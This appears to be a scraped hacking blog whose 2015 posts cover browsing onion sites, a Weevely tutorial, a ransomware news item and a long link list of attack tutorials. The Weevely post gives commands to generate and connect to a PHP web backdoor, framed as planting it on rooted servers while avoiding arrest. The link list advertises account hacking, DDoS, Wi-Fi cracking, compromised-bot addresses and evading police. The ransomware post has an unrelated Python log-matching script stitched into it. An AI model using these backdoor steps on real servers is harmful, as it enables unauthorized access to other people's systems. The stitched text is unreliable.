- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.syd0aEqI.dpuf</div>
<br />
<br />
The second part, using the sniffed traffic, is covered by steps 6 to 9 above.<br />
<br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-39785445900587846052015-09-04T12:05:00.002+05:302015-09-04T12:05:34.474+05:30Browse onion urls without tor<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends,<br />
<br />
Today I wish to share a trick to browse onion URLs without installing the Tor browser.<br />
<br />
<br />
Use the following link:<br />
<br />
http://www.onion.link/<br />
<br />
Important note:<br />
<br />
It will be redirected through "cse.google.com".<br />
<br />
About onion.link (remember):<br />
<br />
<ol>
<li>OnionLink allows regular Internet users to access
onionsites. Unfortunately, this requires sacrificing most of Tor's
privacy protections.</li>
<li>OnionLink provides <i><b>much less security, anonymity, and confidentiality</b></i> than using the <a href="https://www.torproject.org/download/download-easy.html.en">Tor Browser Bundle</a> (TBB). If convenience or speed are not the deciding factors, you should <i>always</i> choose the TBB over OnionLink.</li>
<li>Although publishers remain anonymous, when you use OnionLink your internet service provider <i>can see what content you are accessing</i>.</li>
<li>OnionLink trades privacy for speed and convenience. Do not use
OnionLink if others discovering which onionsites you visit would be
legally perilous.</li>
</ol>
The above link will help you to browse onion URLs without the Tor browser.<br />
<br />
Some onion URLs are:<br />
<br />
<div>
<a href="http://3g2upl4pq6kufc4m.onion/" rel="no-follow" target="_blank">http://3g2upl4pq6kufc4m.onion/ </a> – DuckDuckGo Search Engine</div>
<div>
<a href="http://xmh57jrzrnw6insl.onion/" rel="no-follow" target="_blank">http://xmh57jrzrnw6insl.onion/</a> – TORCH – Tor Search Engine</div>
<div>
<a href="http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page" rel="no-follow" target="_blank">http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page</a> – Uncensored Hidden Wiki</div>
<div>
<a href="http://32rfckwuorlf4dlv.onion/" rel="no-follow" target="_blank">http://32rfckwuorlf4dlv.onion/</a> – Onion URL Repository</div>
<div>
<a href="http://e266al32vpuorbyg.onion/bookmarks.php" rel="no-follow" target="_blank">http://e266al32vpuorbyg.onion/bookmarks.php</a> – Dark Nexus</div>
<div>
<a href="http://5plvrsgydwy2sgce.onion/" rel="no-follow" target="_blank">http://5plvrsgydwy2sgce.onion/</a> – Seeks Search</div>
<div>
<a href="http://2vlqpcqpjlhmd5r2.onion/" rel="no-follow" target="_blank">http://2vlqpcqpjlhmd5r2.onion/</a> – Gateway to Freenet</div>
<div>
<a href="http://nlmymchrmnlmbnii.onion/" rel="no-follow" target="_blank">http://nlmymchrmnlmbnii.onion/</a> – Is It Up?</div>
<div>
<a href="http://kpynyvym6xqi7wz2.onion/links.html" rel="no-follow" target="_blank">http://kpynyvym6xqi7wz2.onion/links.html</a> – ParaZite</div>
<div>
<a href="http://wiki5kauuihowqi5.onion/" rel="no-follow" target="_blank">http://wiki5kauuihowqi5.onion/</a> – Onion Wiki</div>
<div>
<a href="http://torwikignoueupfm.onion/index.php?title=Main_Page" rel="no-follow" target="_blank">http://torwikignoueupfm.onion/index.php?title=Main_Page</a> – Tor Wiki</div>
<div>
<a href="http://kpvz7ki2v5agwt35.onion/" rel="no-follow" target="_blank">http://kpvz7ki2v5agwt35.onion</a> – The Hidden Wiki</div>
<div>
<a href="http://idnxcnkne4qt76tg.onion/" rel="no-follow" target="_blank">http://idnxcnkne4qt76tg.onion/</a> – Tor Project: Anonymity Online</div>
<div>
<a href="http://torlinkbgs6aabns.onion/" rel="no-follow" target="_blank">http://torlinkbgs6aabns.onion/</a> – TorLinks</div>
<div>
<a href="http://jh32yv5zgayyyts3.onion/" rel="no-follow" target="_blank">http://jh32yv5zgayyyts3.onion/</a> – Hidden Wiki .Onion Urls</div>
<div>
<a href="http://wikitjerrta4qgz4.onion/" rel="no-follow" target="_blank">http://wikitjerrta4qgz4.onion/</a> – Hidden Wiki – Tor Wiki</div>
<div>
<a href="http://xdagknwjc7aaytzh.onion/" rel="no-follow" target="_blank">http://xdagknwjc7aaytzh.onion/</a> – Anonet Webproxy</div>
<div>
<a href="http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page" rel="no-follow" target="_blank">http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page</a> – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting</div>
<div>
<a href="http://3fyb44wdhnd2ghhl.onion/" rel="no-follow" target="_blank">http://3fyb44wdhnd2ghhl.onion/</a> – All You’re Base</div>
<div>
<a href="http://j6im4v42ur6dpic3.onion/" rel="no-follow" target="_blank">http://j6im4v42ur6dpic3.onion/</a> – TorProject Archive</div>
<div>
<a href="http://p3igkncehackjtib.onion/" rel="no-follow" target="_blank">http://p3igkncehackjtib.onion/</a> – TorProject Media</div>
<div>
<a href="http://kbhpodhnfxl3clb4.onion/" rel="no-follow" target="_blank">http://kbhpodhnfxl3clb4.onion</a> – Tor Search</div>
<div>
<a href="http://cipollatnumrrahd.onion/" rel="no-follow" target="_blank">http://cipollatnumrrahd.onion/</a> – Cipolla 2.0 (Italian)</div>
<div>
<a href="http://dppmfxaacucguzpc.onion/" rel="no-follow" target="_blank">http://dppmfxaacucguzpc.onion/</a> – TorDir – One of the oldest link lists on Tor</div>
<div>
</div>
<div>
</div>
<div>
For more links use the following :</div>
<div>
</div>
<div>
http://thehiddenwiki.org/ </div>
<br /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-67480696085801137662015-09-03T11:51:00.002+05:302015-09-03T11:51:43.894+05:30Weevely tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
How to use Weevely on Kali Linux:<br />
<br />
A backdoor in a computer system is a method of bypassing normal
authentication, securing unauthorized remote access to a computer,
obtaining access to plaintext, and so on, while attempting to remain
undetected. The backdoor may take the form of an installed program
(e.g., Back Orifice) or may subvert the system through a rootkit.<br />
That's pretty much what happens when we get root on web servers: "Hell yeah, we need backdoors for next time". Sometimes we upload shells and scripts for connect-backs, which are awesome.<br />
One day I surfed to a site, got the c99 source, copied it, tried saving it and, gosh, the worst happened to me: Windows and Avast wouldn't let me save it, because these shells have their sources and signatures flagged as viruses on nearly every system.<br />
The only way to get a secure shell on a server is to create your own.<br />
Kali Linux can generate almost every backdoor type, depending on how you want it: PHP, Android and Windows, to mention a few.<br />
But I will be focusing on Weevely for this post.<br />These shells won't be 100% undetectable, but they can at least get us a better and safer connect-back.<br />
<strong>Weevely</strong> PHP only<br />
<strong>Fire Up Kali</strong><br />Open a console, or terminal as you may prefer to call it, and let's get some work done.<br />
<strong>Weevely</strong><br />First run weevely in your terminal to get the help interface:<br />
> weevely<br />
<figure class="whtGallery" id="59610857docPartGal880003" role="group"><div class="gallery-layout" style="height: 393px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/88/00/63553297496751/0/635532974967518800.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/88/00/63553297496751/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 393px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Yeah,
that seems promising. Now to generate our backdoor: Weevely allows us
to password-protect our shell to prevent unauthorized access.<br />
We are generating a backdoor, so we choose option 4 - Generate a PHP Backdoor.<br />> weevely generate skyvenom<br />
<figure class="whtGallery" id="16522949docPartGal880005" role="group"><div class="gallery-layout" style="height: 433px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/50/62/63553298922904/0/635532989229045062.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/50/62/63553298922904/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 433px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Let's break this down.<br />
weevely generate skyvenom simply tells<br />weevely to generate a PHP shell with a password of "skyvenom" in the current directory.<br />
Run ' ls ' in your terminal and you should see a Weevely-generated file.<br />> ls<br />
Now you have your backdoor. How you get it onto a web server is not my part, so please try as much as possible not to get caught; otherwise, hmm, let me be precise: between 10 and 15 years in jail, since hacking is now considered a great threat to systems.<br />
Let's assume you got your shell on a web server. To connect to our shell we use<br />
> weevely weburl password<br />
> weevely http://10.0.2.2/tnb/weevely.php skyvenom<br />
<figure class="whtGallery" id="48034485docPartGal880007" role="group"><div class="gallery-layout" style="height: 456px; overflow: visible;">
<div class="gallery-layout-container">
<figure class="gal-row gal-row-f gal-wa" data-index="0" style="width: 532px;"><a href="http://img.wonderhowto.com/img/original/20/76/63553300356486/0/635533003564862076.jpg" rel="nofollow" target="_blank"><img alt="" src="http://img.wonderhowto.com/img/20/76/63553300356486/0/hiob-generate-web-backdoors-php-using-weevely-kali-linux.w654.jpg" style="height: 456px; margin-left: 0px; max-width: 532px; width: auto;" /></a></figure></div>
</div>
</figure> Hmm,
it's more awesome to get a shell on your localhost than any other
place in the world. As you can see, I have got a shell on the target in my
LAN, 10.0.2.2.<br />
OK, guys. Have a nice day.<br />Note only: For Educational Purposes.<br />
Hmm,
I always see that shitty crap around, "Educational Purposes", but to keep
my butt safe from your works: For Educational Purposes.<br />
Prompt me if I mistyped or made an error.</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3tag:blogger.com,1999:blog-4509349481580895365.post-36450354955912034202015-09-02T12:41:00.001+05:302015-09-02T12:41:56.948+05:30ORX Locker a new ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<header class="entry-header">
<h2 class="entry-title">
Security experts at Sensecy have uncovered
ORX-Locker, a Darknet Ransomware-as-a-service platform that could allow
everyone to become a cyber criminal.</h2>
</header>
It is becoming even easier to become a cyber-criminal thanks to the sales model known as <a href="http://securityaffairs.co/wordpress/15538/cyber-crime/attacks-as-a-service-maas-faas-different-terms-same-success-hystory.html" target="_blank">malware-as-a-service</a>, which
offers off-the-shelf malware for rent or sale. Recently malware authors
have also started to offer Ransomware-as-a-Service (RaaS); in August
security experts at McAfee discovered in the Deep Web a
ransomware-construction kit, dubbed the <a href="http://securityaffairs.co/wordpress/37180/cyber-crime/tox-ransomware-builder.html" target="_blank">Tox ransomware platform</a>, that implements this sales model and makes it easy to build malware in just 3 steps.<br />
Now experts at Sensecy are warning of a new RaaS platform dubbed <a href="http://blog.sensecy.com/2015/08/30/orx-locker-a-darknet-ransomware-that-even-your-grandmother-can-use/" target="_blank">ORX-Locker</a>. It allows criminals to create their own piece of malware to infect systems and demand payment of a fee to unlock the system.<br />
In the RaaS model, when victims decide to pay, the malware redirects them
through a service provider that keeps a percentage of the fee and forwards
the rest to the criminal.<br />
ORX implements a sophisticated AV evasion method and complex
communication techniques; the researchers discovered that it uses
universities and other platforms as control infrastructure.<br />
<strong>The first appearance of the ORX ransomware is dated </strong>August 25, 2015, when a user dubbed <em>orxteam </em>announced the availability of a new RaaS service in a post.<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/Team-Orx-RaaS-ransomware-message.png"><img alt="Team Orx RaaS ransomware message" class="aligncenter wp-image-39755" height="120" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/Team-Orx-RaaS-ransomware-message.png" width="500" /></a><br />
Team ORX developed a hidden service to implement the RaaS; the
experts highlight that the website requests only a few details from new users.<br />
“To enter the site, new users just need to register. No email or
other identifying details are required. Upon registration, users have
the option to enter a referral username, which will earn them three
percent from every payment made to the new user.” states the post, which
provides a detailed description of the ORX platform.<br />
To create a ransomware stub, users just need to add the
ID number (5 digits max) and the ransom price (ORX sets a minimum of
$75), then click the Build EXE button.<br />
The user can easily withdraw his earnings by transferring them to a
Bitcoin address using the Wallet function. The Orx ransomware
platform also provides friendly statistics for its users.<br />
The Orx ransomware comes as a zip file containing the binary for the malware.<br />
The researchers at Sensecy have identified the following addresses as belonging to the C&C infrastructure.<br />
<ol>
<li><em>130[.]75[.]81[.]251 – Leibniz University of Hanover</em></li>
<li><em>130[.]149[.]200[.]12 – Technical University of Berlin</em></li>
<li><em>171[.]25[.]193[.]9 – DFRI (Swedish non-profit and non-party organization working for digital rights)</em></li>
<li><em>199[.]254[.]238[.]52 – </em>Riseup<em> (Riseup provides online communication tools for people and groups working on liberatory social change)</em></li>
</ol>
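A defender's use of the four addresses listed above, as an added example that is not from the Sensecy post or the original article: it refangs the defanged indicators and matches them against the destination field of connection logs. The `key=value` log format, the sample lines and the per-source ranking are constructed assumptions; since the listed hosts belong to universities and other shared platforms, a source that contacts several of them is ranked first for triage.

```python
import ipaddress
from collections import defaultdict

# Defanged indicators exactly as listed in the article, with the owner
# labels the article gives for each address.
ORX_C2_DEFANGED = {
    "130[.]75[.]81[.]251": "Leibniz University of Hanover",
    "130[.]149[.]200[.]12": "Technical University of Berlin",
    "171[.]25[.]193[.]9": "DFRI",
    "199[.]254[.]238[.]52": "Riseup",
}


def refang(indicator):
    """Turn '130[.]75[.]81[.]251' into a validated ipaddress object."""
    return ipaddress.ip_address(indicator.strip().replace("[.]", "."))


# Comparing parsed addresses (not substrings) means 130.75.81.25 or
# 1130.75.81.251 can never be mistaken for 130.75.81.251.
WATCHLIST = {refang(ioc): owner for ioc, owner in ORX_C2_DEFANGED.items()}

# Constructed sample log in an assumed key=value format (not real traffic).
SAMPLE_LOG = """\
2015-09-01T10:02:11Z src=10.1.4.23 dst=130.75.81.251 dport=443 bytes=5120
2015-09-01T10:02:12Z src=10.1.4.40 dst=130.75.81.25 dport=443 bytes=900
2015-09-01T10:03:40Z src=10.1.4.23 dst=199.254.238.52 dport=443 bytes=7301
2015-09-01T10:04:02Z src=10.1.7.9 dst=171.25.193.9 dport=80 bytes=412
2015-09-01T10:05:19Z src=10.1.7.9 dst=not-an-ip dport=80 bytes=0
2015-09-01T10:06:55Z src=10.1.4.23 dst=130.75.81.251 dport=443 bytes=2210
""".splitlines()


def parse_fields(line):
    """Split a log line into its key=value fields."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def find_hits(lines):
    """Return (line_no, src, dst, owner) for each connection to a listed address."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        fields = parse_fields(line)
        try:
            dst = ipaddress.ip_address(fields.get("dst", ""))
        except ValueError:
            continue  # missing or malformed destination: nothing to match
        if dst in WATCHLIST:
            hits.append((line_no, fields.get("src", "?"), str(dst), WATCHLIST[dst]))
    return hits


def triage(hits):
    """Rank internal sources by how many distinct listed addresses they contacted."""
    per_src = defaultdict(set)
    for _, src, dst, _ in hits:
        per_src[src].add(dst)
    ranked = [(src, len(dsts)) for src, dsts in per_src.items()]
    return sorted(ranked, key=lambda item: (-item[1], item[0]))


if __name__ == "__main__":
    found = find_hits(SAMPLE_LOG)
    for line_no, src, dst, owner in found:
        print(f"line {line_no}: {src} -> {dst} ({owner})")
    for src, distinct in triage(found):
        print(f"{src}: {distinct} distinct listed destination(s)")
```
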
The Orx ransomware encrypts the victim’s files and informs the victim of
the infection by displaying a popup message; it also creates a file on the
desktop containing the payment instructions.<br />
<img alt="orx platform message" class="aligncenter wp-image-39757" height="188" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/orx-platform-message.png" width="470" /><br />
The post published by the researchers at Sensecy also includes a YARA rule for detecting the malware.<br />
<br />
<br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-24855263553036130752015-08-31T17:48:00.001+05:302015-08-31T17:49:22.346+05:30Sites to learn about hacking<div dir="ltr" style="text-align: left;" trbidi="on">
Testing and learning<br />
-----------------------<br />
http://hack.darkn3ss.com/<br />
<br />
http://link-base.org/<br />
<br />
http://ringzer0team.com/<br />
<br />
http://www.irongeek.com/<br />
<br />
https://hack.me/<br />
<br />
http://halls-of-valhalla.org/beta/challenges<br />
<br />
http://evilzone.org<br />
<br />
https://evilzone.org/wiki/index.php/The_big_ebook_index<br />
<br />
http://wecan.hasthe.technology/ <--- fuckin' down, AGAIN <br />
<br />
http://www.securitytube.net/<br />
<br />
http://null-byte.wonderhowto.com/how-to/<br />
<br />
http://n0where.net/<br />
<br />
http://www.offensive-security.com/metasploit-unleashed<br />
<br />
http://www.exploit-db.com/<br />
<br />
https://siph0n.net/<br />
<br />
http://www.cvedetails.com/<br />
<br />
http://resources.infosecinstitute.com/<br />
<br />
http://www.windowsecurity.com/articles-tutorials/<br />
<br />
http://www.securitysift.com/<br />
<br />
http://www.sans.org/reading-room/<br />
<br />
http://packetstormsecurity.com/files/<br />
<br />
https://www.corelan.be/index.php/articles/<br />
<br />
http://routerpwn.com/<br />
<br />
http://opensecuritytraining.info/Training.html<br />
<br />
https://www.blackhat.com/html/archives.html<br />
<br />
http://magazine.hitb.org/hitb-magazi<br />
<br />
http://gcc.godbolt.org/ <--- helpful for learning Assembly<br />
<br />
http://www.learninghowtohack.com/free-hacker-course/ <--- Sounds like he made it on his mom's computer, some useful information, but most is skid-like bullshit. <br />
<br />
https://www.vulnhub.com/<br />
<br />
https://wigle.net/ <--- Find wifi hotspots in your area<br />
<br />
http://blasze.tk/ <---Honey-pot maker<br />
<br />
shodanhq.com <-- find computers and servers<br />
<br />
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64 <br />
<br />
https://www.exploit-db.com/google-hacking-database/ <br />
<br />
http://greysec.net/<br />
<br />
https://www.owasp.org/index.php/Main_Page<br />
<br />
http://phrack.org/<br />
<br />
https://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html<br />
<br />
http://insecure.org/stf/smashstack.html<br />
<br />
http://securityoverride.org/forum/viewthread.php?thread_id=2672<br />
<br />
https://ipalyzer.com/ <-- decent recon tool <br />
<br />
http://pentestmonkey.net/<br />
<br />
https://wiki.skullsecurity.org/index.php?title=Main_Page<br />
<br />
https://nets.ec/Main_Page<br />
<br />
VIRUS/MALWARE<br />
-------------------------------------------<br />
http://www.openrce.org<br />
<br />
vxheavens.com<br />
<br />
offensivecomputing.net<br />
<br />
exploit-db.com<br />
<br />
inj3ct0r.com <br />
<br />
WARGAMES<br />
--------------------------------------------<br />
http://overthewire.org/wargames/ <--- great for beginners learning GNU/Linux <br />
<br />
https://www.pentesterlab.com/<br />
<br />
http://www.itsecgames.com/<br />
<br />
https://exploit-exercises.com/<br />
<br />
http://www.enigmagroup.org/<br />
<br />
http://smashthestack.org/<br />
<br />
http://3564020356.org/<br />
<br />
http://www.hackthissite.org/ <---great community <br />
<br />
http://www.hackertest.net/<br />
<br />
PWNED BOTS<br />
============================================================================================================<br />
http://185.12.44.55:8080/tasks<br />
http://45.55.82.110/findi/ <---- port 80 search engine <br />
<br />
DISTROS <br />
--------------------------------------------------------<br />
https://www.kali.org/<br />
<br />
http://sourceforge.net/projects/metasploitable/<br />
<br />
https://tails.boum.org/<br />
<br />
http://ophcrack.sourceforge.net/<br />
<br />
<br />
Recommended VPNs<br />
------------------------<br />
https://www.frootvpn.com/ (doesn't log SHIT, a bit sketchy for free tho)<br />
<br />
YOUTUBE TALKS <br />
----------------------------------------------------------------------------------------------------------<br />
https://www.youtube.com/watch?v=wynvicPjRDk<br />
https://www.youtube.com/watch?v=35teUHnZNGU<br />
<br />
Good reads<br />
-----------------------------------------------------------------------------------------------------------<br />
https://security.stackexchange.com/questions/32064/at-what-point-does-something-count-as-security-through-obscurity<br />
<br />
Hacktorials<br />
--------------------------------------------------------------------------------<br />
How to prepare SQL Injection attack with SQLMap on Kali Linux<br />
http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html<br />
<br />
How to hack Wi-Fi using Wifite<br />
http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html<br />
<br />
How to detect XSS vulnerability attack on any website using XSSER on Kali Linux<br />
https://www.youtube.com/watch?v=Kk39RACyaHc<br />
<br />
How to prepare SYN Attack using Kali Linux<br />
https://www.youtube.com/watch?v=aJ9syL4S7yE<br />
<br />
How to prepare DDOS attack on a website using Kali Linux<br />
https://www.youtube.com/watch?v=Tb8sxwQTpN8<br />
<br />
4 ways to hack Facebook account<br />
http://null-byte.wonderhowto.com/how-to/4-ways-crack-facebook-password-and-protect-yourself-from-them-0139532/<br />
<br />
4 ways hacking Gmail account<br />
http://www.wikihow.com/Hack-Gmail<br />
<br />
How to update rules in SNORT<br />
http://openmaniak.com/snort_tutorial_update.php<br />
<br />
How to hack Facebook account using SE-Toolkit on Kali Linux<br />
https://www.youtube.com/watch?v=EwhpknawB_E<br />
<br />
How to find information about someone using Maltego<br />
https://www.youtube.com/watch?v=XDek66EuYJw<br />
<br />
How to gather information about someone using Backtrack<br />
https://www.youtube.com/watch?v=RiRFmlzPCIs<br />
<br />
Gathering information using NMap<br />
https://www.soldierx.com/tutorials/Pentesting-Tutorial-1-Information-Gathering-Part-1-Nmap<br />
<br />
How to install firewall on Linux machine<br />
http://pastebin.com/ZKXgf8UW<br />
<br />
How to configure firewall<br />
http://pastebin.com/mSM4beng<br />
<br />
Video tutorial showing a practical application of the Parameter Delimiter attack<br />
https://www.youtube.com/watch?v=i8I5jFjxKD4<br />
<br />
Step-By-Step SQL Injection<br />
https://www.youtube.com/watch?v=7H358PrFagc<br />
<br />
How to use SQLMap tool<br />
http://pastebin.com/PqXZLseE<br />
<br />
Tutorial about Search Engine Dorking<br />
http://pastebin.com/Lk67pXJf<br />
<br />
RFI Tutorial<br />
http://pastebin.com/SsTzxPUv<br />
<br />
Text tutorial about preparing Man in the Middle attack using Ettercap tool<br />
http://openmaniak.com/ettercap_filter.php<br />
<br />
Using HPing3 tool in Kali Linux<br />
https://www.youtube.com/watch?v=rtdrEwSBHKk<br />
<br />
How to use THC-IPv6 toolset<br />
https://www.youtube.com/watch?v=HkmlS40o-yM<br />
<br />
How to use Ping tool in Linux<br />
http://www.thegeekstuff.com/2009/11/ping-tutorial-13-effective-ping-command-examples/<br />
<br />
Tutorial about using NMap port scanner<br />
http://nmap.org/bennieston-tutorial/<br />
<br />
Usage of Brutus AET2<br />
https://dl-web.dropbox.com/get/HackTut/1brutus1.rar?_subject_uid=98829851&w=AACQZykfsnfXcFni34ssVd5KtE6BjbgIYxYTDMNt7GiLiA&dl=1<br />
<br />
How to sniff passwords using Cain<br />
https://dl-web.dropbox.com/get/HackTut/1cain1.rar?_subject_uid=98829851&w=AABoUZoTcWEypktEvKHyOWMPMyDo-EBkyyI8qwLMZi0Tfg&dl=1<br />
<br />
Sniffing logins and passwords<br />
https://dl-web.dropbox.com/get/HackTut/1dsniff.rar?_subject_uid=98829851&w=AAAhVYXG1yIxPA5KBPVAwnnv48iEHe3VzoPYebGxNXjnWw&dl=1<br />
<br />
Graphical view on the network using Etherape<br />
https://www.youtube.com/watch?v=kVyEOqXqWdw<br />
<br />
Videotutorial that shows how to use NMap on Kali Linux<br />
http://www.youtube.com/watch?v=LxScONd1HmQ<br />
<br />
How to do ARP Poisoning attack using Ettercap<br />
http://openmaniak.com/ettercap_arp.php<br />
<br />
How to prepare Man in the Middle attack using Ettercap<br />
http://www.youtube.com/watch?v=Z19p4nDfeG8<br />
<br />
How to see network usage with Ettercap<br />
http://openmaniak.com/ettercap_stat.php<br />
<br />
Description of various Network Interfaces<br />
http://openmaniak.com/networking.php<br />
<br />
Tutorial about Ping tool usage<br />
http://openmaniak.com/ping.php<br />
<br />
Videotutorial that shows how to hack WPA & WPA2 password using Aircrack-ng software<br />
https://www.youtube.com/watch?v=GLO9HGDwOY0<br />
<br />
How to crack Wi-Fi protected by WEP using Aircrack-ng<br />
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack<br />
<br />
How to hack Wi-Fi protected by WPA/WPA2 using Aircrack-ng<br />
http://www.aircrack-ng.org/doku.php?id=cracking_wpa<br />
<br />
How to prepare EvilTwin attack on Kali Linux<br />
http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html<br />
<br />
How to crack WEP faster in Kali Linux<br />
http://www.kalitutorials.net/2014/03/speeding-up-wep-hacking.html<br />
<br />
How to hack WEP protected Wi-Fi with Aircrack-ng<br />
http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html<br />
<br />
How to hack WPA/WPA2 Wi-Fi protected network using Reaver<br />
http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-reaver-kali-linux.html<br />
<br />
How ATM can be hacked with just a SMS<br />
http://www.technotification.com/2014/03/windows-xp-flow-atm-being-hacked-by.html<br />
<br />
Linux Security Secrets and Solutions<br />
https://dl.dropboxusercontent.com/content_link/eClOBdAyKBl1G1eTm8HTC1jhXtikVcfGFkH1uAPS3QrMFuiOtScxTK00gbgFsa1T?dl=1<br />
<br />
Over 70 recipes to help you master Kali Linux for effective penetration testing<br />
https://dl.dropboxusercontent.com/content_link/IOvaJ93lhCZc82awc3uLrKyFmDVmmurRjDgjm81efBGcxGwvj1uwy2T1eWtrbABC?dl=1<br />
<br />
A few attacks on an older version of the Windows operating system<br />
http://archsterowniki.ucoz.com/publ/starsze_wersje_windows/ataki_na_windows_95_98/5-1-0-234<br />
<br />
Or how to open an .exe file thinking it is a .jpg<br />
http://archsterowniki.ucoz.com/publ/hacking/jak_zamienic_exe_na_jpg_binder_exe_to_jpg_ukrywanie_rozszerania_plikow_jak_ukryc_rozszerzenie_pliku_jak_ukryc_rozszerzenia_plikow/11-1-0-118<br />
<br />
How to reset Windows admin password using Linux :)<br />
http://www.junauza.com/2009/01/hacking-windows-administrator-password.html<br />
<br />
How to hack Win7 using backdoor on Kali Linux<br />
https://www.youtube.com/watch?v=nBXFqHa8lWA<br />
<br />
A guide showing how to break into a computer running Windows.<br />
http://www.pcworld.pl/news/356745_2/Jak.wlamac.sie.do.komputera.html<br />
<br />
How to exploit Windows7 machine using Metasploit<br />
https://www.youtube.com/watch?v=qXLyFGyhElw<br />
<br />
Some ways to exploit Windows7 & 8 using Backtrack<br />
https://www.youtube.com/watch?v=Kbka0dW5YGI<br />
<br />
Video tutorial showing how to use the dnsdict6 program to perform DNS enumeration<br />
https://www.youtube.com/watch?v=gkrCc-LYEfo<br />
<br />
How to enumerate DNS using DNSMap on Kali Linux<br />
https://www.youtube.com/watch?v=ieSrHQJ61b8<br />
<br />
How to crack MD5 hash using Perl script on Kali Linux<br />
https://www.youtube.com/watch?v=zTiwlUP8VjM<br />
<br />
How to hack remote computer if you know an IP address ;)<br />
https://www.youtube.com/watch?v=XLaEqwFUFLU<br />
<br />
How to secure hard drive with TrueCrypt<br />
http://pastebin.com/UeWx06wy<br />
<br />
How to create encrypted hidden volumes in TrueCrypt<br />
http://pastebin.com/DBfSyaun<br />
<br />
Introduction to Public Key Cryptography<br />
https://developer.mozilla.org/en-US/docs/Introduction_to_Public-Key_Cryptography<br />
<br />
A video showing how to discover GG numbers that have a given password set<br />
https://www.youtube.com/watch?v=01VwgaZbxLI<br />
<br />
How to admin an IRC channel :)<br />
http://pastebin.com/arksUsJM<br />
<br />
How to IRC anonymously with XChat+Tor<br />
http://pastebin.com/fxRWS6Cr<br />
<br />
https://www.youtube.com/watch?v=KLSoyp1-q80<br />
<br />
How to make your own programming language based on Ruby. Part II - creating a language compiled to pseudocode<br />
https://www.youtube.com/watch?v=_Q3e3eSJom4<br />
<br />
How to use the Registry pattern in PHP<br />
http://pastebin.com/h3VTFQwp<br />
<br />
How to install VirtualBox on Windows<br />
http://pastebin.com/YpBVDzqn<br />
<br />
How to install Guest Additions in Virtualbox<br />
http://pastebin.com/Exqh0sFb<br />
<br />
A tutorial covering Bluetooth on Android :)<br />
http://andrzejklusiewicz-android.blogspot.com/2014/02/bluetooth-czyli-niebieskie-pogaduszki.html<br />
<br />
A tutorial covering the basics of 2D graphics on Android.<br />
http://andrzejklusiewicz-android.blogspot.com/2014/02/podstawowa-grafika-2d.html<br />
<br />
A dozen or so hacker terms that everyone starting out in hacking should know<br />
http://archsterowniki.ucoz.com/publ/hacking/hacking_podstawy/11-1-0-348<br />
<br />
How to install Ubuntu<br />
http://pastebin.com/f7Yu542i<br />
<br />
How to configure Ubuntu<br />
http://pastebin.com/ULbWWLJt<br />
<br />
Installing Tor for Windows<br />
http://pastebin.com/nqZ93QPG<br />
<br />
How to clean up traces in Windows<br />
http://pastebin.com/5fA7BvZ1<br />
<br />
How to shred free space<br />
http://pastebin.com/RfNLq3hf<br />
<br />
How to secure your computer and surf completely anonymous<br />
http://pastebin.com/PdJH535C<br />
<br />
How to configure Tor Only Environment<br />
http://pastebin.com/RLiDSaTJ<br />
<br />
How to protect yourself from police<br />
http://pastebin.com/LQ3PbBLq<br />
<br />
How to install IRC client on Linux machine<br />
http://pastebin.com/e5hhPF3u<br />
<br />
How to install Torchat<br />
http://pastebin.com/57T1sZU9<br />
<br />
How to configure SNORT<br />
http://openmaniak.com/snort_tutorial_snort.php<br />
<br />
Daily usage of Tor<br />
http://pastebin.com/fJjgaPvz<br />
<br />
Basic usage of Wireshark<br />
http://openmaniak.com/wireshark_use.php<br />
<br />
Usage of Wireshark's filters<br />
http://openmaniak.com/wireshark_filters.php<br />
<br />
How to configure BASE to work with SNORT<br />
http://openmaniak.com/snort_tutorial_base.php<br />
<br />
Using BleedingSNORT rules in SNORT<br />
http://openmaniak.com/snort_bleeding.php<br />
<br />
Some things about Port Mirroring in SNORT<br />
http://openmaniak.com/snort_other.php<br />
<br />
How to use TCPDump tool<br />
http://openmaniak.com/tcpdump.php<br />
<br />
